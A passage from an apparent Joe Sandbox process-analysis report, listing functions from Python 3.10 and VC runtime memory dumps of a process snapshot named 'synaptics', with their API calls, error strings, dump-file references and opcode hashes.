                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$Clear$FromObjectS_snprintfUnicode_strncpy
                                                                                                                                                                                                      • String ID: %.200s is not a sequence$'%.200s' object does not support indexing$None$is not retrievable$must be %d-item sequence, not %.50s$must be sequence of length %d, not %zd$object of type '%.200s' has no len()
                                                                                                                                                                                                      • API String ID: 161783566-556401458
                                                                                                                                                                                                      • Opcode ID: 7ae1861685c571f45a04cc4e6b5869adbcf65d70577a42159580b7d19e83b818
                                                                                                                                                                                                      • Instruction ID: 76da2c68a6794c7ee0cb1fded939b1e0f9a1fc0add4e23e44392c120dcf2d64b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ae1861685c571f45a04cc4e6b5869adbcf65d70577a42159580b7d19e83b818
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1471C071605105DFDB00CF6ADD80AAAB7B5FF85318F244969E8199BF71D732D812CB90
                                                                                                                                                                                                      Function 6C4D1CB0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 181COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?), ref: 6C4D1CE7
                                                                                                                                                                                                        • Part of subcall function 6C4D1F70: _PyErr_NoMemory.PYTHON310(00000000,?,?,?), ref: 6C4D1FF2
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?), ref: 6C4D1CFF
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D8D8,00000000,00000000,00000000,00000000), ref: 6C4D1D48
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C9A8,00000000,00000000,00000000,00000000), ref: 6C4D1DA4
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(Cannot write %zi characters at %zi in a string of %zi characters,?,?,?), ref: 6C4D1DF0
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\unicodeobject.c,000006BC), ref: 6C4D1E83
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Cannot write %zi characters at %zi in a string of %zi characters, xrefs: 6C4D1DE5
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4D1E77
                                                                                                                                                                                                      • how_many cannot be negative, xrefs: 6C4D1D8F
                                                                                                                                                                                                      • string index out of range, xrefs: 6C4D1D33
                                                                                                                                                                                                      • D:\a\1\s\Objects\unicodeobject.c, xrefs: 6C4D1E72
                                                                                                                                                                                                      • Cannot copy %s characters into a string of %s characters, xrefs: 6C4D1E42
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatObjectReadyUnicode_$Memory
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$Cannot copy %s characters into a string of %s characters$Cannot write %zi characters at %zi in a string of %zi characters$D:\a\1\s\Objects\unicodeobject.c$how_many cannot be negative$string index out of range
                                                                                                                                                                                                      • API String ID: 1578449976-3773868903
                                                                                                                                                                                                      • Opcode ID: aa0e8f527dc338526ca30a9ddf360f2d69009319374561492a1f23e5f4a7bec3
                                                                                                                                                                                                      • Instruction ID: 5a65e381dc91a2049a0b0551c93565659f5174bd26d646f40c06230f19287901
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa0e8f527dc338526ca30a9ddf360f2d69009319374561492a1f23e5f4a7bec3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E51487270020557DB10EA69AC92FAA73A5DBC137AF150369FD2C87BD1EB21FC1182E1
                                                                                                                                                                                                      Function 73A8DBD8 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Replicator::operator[].LIBVCRUNTIME ref: 73A8DC15
                                                                                                                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 73A8DC67
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator=Replicator::operator[]
                                                                                                                                                                                                      • String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                      • API String ID: 3211817929-3433397351
                                                                                                                                                                                                      • Opcode ID: cd66f4de7c5ce2fb949a08b0959cacadde50fc14c5592d1e6a68cf435efb5997
                                                                                                                                                                                                      • Instruction ID: a0ebfdc5c25977ccea8ae0f7b05ea9941319034079859a8e111ffa769a543226
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd66f4de7c5ce2fb949a08b0959cacadde50fc14c5592d1e6a68cf435efb5997
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D61B172900309DFDB06DFA5C986BEEBBB8EF08314F54412BD656BB298DB345905CB50
                                                                                                                                                                                                      Function 6C58F440 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(?,000000FF,000000FF,00000000,?,?,?,?,6C58ACC0,00000000), ref: 6C58F477
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C58ACC0,00000000), ref: 6C58F4A7
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000,?,?,?,?,?,6C58ACC0,00000000), ref: 6C58F4C6
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C58ACC0,00000000), ref: 6C58F4CD
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C58F4D9
                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6C58F4E8
                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 6C58F4F1
                                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6C58F504
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(tstate_delete_common,?,?,?,?,6C58ACC0,00000000), ref: 6C58F516
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(tstate_delete_common,NULL interpreter,tstate_delete_common,?,?,?,?,6C58ACC0,00000000), ref: 6C58F525
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Error$CriticalFatalLastSectionValue$EnterError_FuncLeaveReleaseSemaphoreThread_acquire_lock_timedTstate
                                                                                                                                                                                                      • String ID: @bJl$NULL interpreter$tstate_delete_common
                                                                                                                                                                                                      • API String ID: 4029217565-1875552255
                                                                                                                                                                                                      • Opcode ID: 1d4b5b9ea8601be4f614039bda5482f247b0cdc68881fcd9d4356832a5d28070
                                                                                                                                                                                                      • Instruction ID: 3c558afa6c00aa210b6656df1221dbc9f01687602f664828f585cc02c28845fb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d4b5b9ea8601be4f614039bda5482f247b0cdc68881fcd9d4356832a5d28070
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE31C1316026209BCB10EF69CC44B4ABBB4EF49718F148759F9699BBA1D730F904CB95
                                                                                                                                                                                                      Function 6C5BBB80 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 33COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • wcschr.VCRUNTIME140(?,0000003B), ref: 6C5BBB97
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000001), ref: 6C5BBBB1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: List_wcschr
                                                                                                                                                                                                      • String ID: PySys_SetArgvEx$PySys_SetPath$argv$can't assign sys.argv$can't assign sys.path$can't compute path0 from argv$can't create sys.path$can't prepend path0 to sys.path$no mem for sys.argv
                                                                                                                                                                                                      • API String ID: 1175410442-1125674054
                                                                                                                                                                                                      • Opcode ID: 8af82cc8f4e22332273a68a1afc91cefce36b1fa75490e51289918d476afad85
                                                                                                                                                                                                      • Instruction ID: 5b36f199a71d900ca7bc30f88530e6353c38a7cc0fd0436a7919a1dfa3fe17b4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8af82cc8f4e22332273a68a1afc91cefce36b1fa75490e51289918d476afad85
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DE086705062157BDF0075964DD0F9B799C5F75954F1804247E0472F82DBA9FB0681FA
                                                                                                                                                                                                      Function 6C5AFA60 Relevance: 22.6, APIs: 15, Instructions: 134COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(?,6C73DA58), ref: 6C5AFA8D
                                                                                                                                                                                                        • Part of subcall function 6C565880: PyTuple_Size.PYTHON310(?,?,?,?,?,6C452185,?,?,00000000,?), ref: 6C5658A3
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00000000,?), ref: 6C5AFACE
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C5AFAD4
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E150), ref: 6C5AFB04
                                                                                                                                                                                                      • PyObject_GetAttr.PYTHON310(?,00000000), ref: 6C5AFB12
                                                                                                                                                                                                      • PyLong_AsLong.PYTHON310(?), ref: 6C5AFB52
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?), ref: 6C5AFB74
                                                                                                                                                                                                      • PyFile_WriteObject.PYTHON310(?,00000000,00000001), ref: 6C5AFB8C
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000001), ref: 6C5AFB9A
                                                                                                                                                                                                      • PyObject_Print.PYTHON310(?,00000000), ref: 6C5AFBA1
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C5AFBAB
                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C5AFBB1
                                                                                                                                                                                                      • PySys_WriteStderr.PYTHON310(6C6E7728), ref: 6C5AFBBF
                                                                                                                                                                                                      • _PyErr_Restore.PYTHON310(?,?,?,?), ref: 6C5AFBD9
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?), ref: 6C5AFBE4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$__acrt_iob_func$ClearObject_Writefflush$AttrExceptionFile_FromGivenLongLong_MatchesObjectPrintRestoreSizeStderrSys_Tuple_Unicode_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3902443643-0
                                                                                                                                                                                                      • Opcode ID: f92ce321ee98ae6df45b526064f7d148f2ba7e86dc6dbfb732e81747fca6c22c
                                                                                                                                                                                                      • Instruction ID: 2d6be9e372d677a96484faae45320180a089ff0a5aca84c2363db54f3e6408ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f92ce321ee98ae6df45b526064f7d148f2ba7e86dc6dbfb732e81747fca6c22c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C4127B1A012089FDB10DB9ADC99F9A37B89B44368F114178EC098BF61D735E946C7E2
                                                                                                                                                                                                      Function 6C4A3DC0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 161COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,frame does not exist), ref: 6C4A3DEB
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • PyFrame_FastToLocalsWithError.PYTHON310(?), ref: 6C4A3DFC
                                                                                                                                                                                                      • PyDict_Keys.PYTHON310(?), ref: 6C4A3E21
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(dir(): expected keys() of locals to be a list, not '%.200s',?), ref: 6C4A3E5D
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C4DC), ref: 6C4A3E8C
                                                                                                                                                                                                      • _PyType_Lookup.PYTHON310(?,00000000), ref: 6C4A3E9E
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000000), ref: 6C4A3EF9
                                                                                                                                                                                                      • PyList_Sort.PYTHON310(00000000), ref: 6C4A3F53
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(object does not provide __dir__), ref: 6C4A3F7A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • object does not provide __dir__, xrefs: 6C4A3F6F
                                                                                                                                                                                                      • dir(): expected keys() of locals to be a list, not '%.200s', xrefs: 6C4A3E52
                                                                                                                                                                                                      • frame does not exist, xrefs: 6C4A3DDF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$List_String$Dict_ErrorFastFormatFrame_FromKeysLocalsLookupObjectSortType_Unicode_With
                                                                                                                                                                                                      • String ID: dir(): expected keys() of locals to be a list, not '%.200s'$frame does not exist$object does not provide __dir__
                                                                                                                                                                                                      • API String ID: 451624669-1441539303
                                                                                                                                                                                                      • Opcode ID: 4773c28e7ce9f45bcb3c5efce0ea1f63540b130c076a13cfee89aa3fa43a1d0d
                                                                                                                                                                                                      • Instruction ID: 5d5af43a86bf700cdf4094be71e5e6a98a9237f2517088447c03cd2826675c3a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4773c28e7ce9f45bcb3c5efce0ea1f63540b130c076a13cfee89aa3fa43a1d0d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C341F672B125119BC610DAE8AC01F86B3B49F6573AB144328FD2897B95F721ED07C7D1
                                                                                                                                                                                                      Function 6C575950 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 131COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C575970
                                                                                                                                                                                                      • PyModule_GetDef.PYTHON310(?), ref: 6C575981
                                                                                                                                                                                                      • PyObject_SetItem.PYTHON310(?,?,?), ref: 6C5759A8
                                                                                                                                                                                                      • _PyState_AddModule.PYTHON310(?,?,00000000), ref: 6C5759BD
                                                                                                                                                                                                        • Part of subcall function 6C58F030: _PyErr_SetString.PYTHON310(?,PyState_AddModule called on module with slots,?,00000000), ref: 6C58F051
                                                                                                                                                                                                      • PyObject_DelItem.PYTHON310(?,?), ref: 6C5759D0
                                                                                                                                                                                                      • PyModule_GetDict.PYTHON310(?), ref: 6C575A1D
                                                                                                                                                                                                      • PyDict_Copy.PYTHON310(00000000), ref: 6C575A2E
                                                                                                                                                                                                      • PyTuple_Pack.PYTHON310(00000002,?,?), ref: 6C575A71
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(00000000,00000000), ref: 6C575A87
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Python\import.c,000001A9), ref: 6C575AC7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C575ABB
                                                                                                                                                                                                      • D:\a\1\s\Python\import.c, xrefs: 6C575AB6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Item$Dict_Err_Module_Object_$CopyDictFormatModulePackState_StringSubtypeTuple_Type_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Python\import.c
                                                                                                                                                                                                      • API String ID: 3992255289-4236971450
                                                                                                                                                                                                      • Opcode ID: b09a21fe3faf9e93c7fab086444df956ea6de60362008bd3465379a6ef5116ba
                                                                                                                                                                                                      • Instruction ID: 1c6351e37b5e4501c847d07073e1d8c29df95379a04743faf221e15192418f16
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b09a21fe3faf9e93c7fab086444df956ea6de60362008bd3465379a6ef5116ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5411771A00205ABEF21DE65DC41E9637B4EB8137AF584238E82887A91E731D995CBF1
                                                                                                                                                                                                      Function 6C4B2E70 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 112COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_FromModuleAndSpec.PYTHON310 ref: 6C4B2FB7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
